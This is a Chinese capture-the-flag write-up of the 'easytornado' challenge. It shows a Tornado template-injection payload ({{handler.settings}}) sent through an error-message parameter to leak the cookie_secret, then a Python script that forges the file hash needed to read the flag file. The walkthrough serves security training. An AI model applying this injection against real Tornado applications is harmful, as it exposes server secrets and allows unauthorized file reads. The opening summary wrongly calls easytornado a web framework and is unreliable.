easytornado-攻防世界，easytornado，攻防世界实战指南

摘要：easytornado是一个基于Tornado框架的Web开发框架，旨在提供简单易用的Web开发体验。攻防世界则是一个关于网络安全攻防技术的领域，涉及到网络安全技术、攻防策略等多个方面。easytornado在攻防世界中的应用可能包括使用Web开发技术构建安全的应用程序，提高应用程序的安全性和防护能力，以应对网络攻击和威胁。

题目

看到flag.txt点击进去

题中提示render 

可以观察url

61.147.171.105:51567/file?filename=/hints.txt&filehash=61c9f13a8bae46973d56ca4a693847d5

由文件名和文件的hash值可查询对应文件内容，现在就差个cookie_secret不知道

那么如何获得cookie_secret呢?

查到cookie_secret在application对象settings属性中,

self.application.settings可以用handler替代

handler指向处理当前这个页面的RequestHandler对象, RequestHandler.setting指向self.application.settings,因此构造payload

{{handler.settings}}

Tornado全称Tornado Web Server，是一个用Python语言写成的Web服务器兼Web应用框架

tornado render是python中的一个渲染函数，也就是一种模板，通过调用的参数不同，生成不同的网页，如果用户对render内容可控，不仅可以注入XSS代码，而且还可以通过{{}}进行传递变量和执行简单的表达式

tornado render模板注入

SSTI模板注入学习 - fdx_xdf - 博客园 (cnblogs.com)

查询到可以使用{{handler.settings}}获取服务器的配置文件信息

playload

/file?filename={{handler.settings }}

报错了

61.147.171.105:51567/error?msg=Error

观察到Error与下方Error报错信息相同

将读取配置文件的代码放到msg后面。

构造payload：

error?msg={{handler.settings}} 

成功拿到 

'cookie_secret': 'a4860747-2d1b-4084-815e-56d946ad036f'}

import hashlib

def md5(message):

    md5 = hashlib.md5()

    md5.update(message.encode('utf-8'))

    return md5.hexdigest()

def main(salt, name):

    print(md5(salt + md5(name)))

if __name__ == "__main__":

    cookie_secret='a4860747-2d1b-4084-815e-56d946ad036f'

    filename = "/fllllllllllllag"

    main(cookie_secret, filename)

73e4ae0d5195c1529b924a29c28823c7

拿到了最后的md5值 ，但是搞了半天flag不出来。

61.147.171.105:51567/file?filename=/fllllllllllllag&filehash=73e4ae0d5195c1529b924a29c28823c7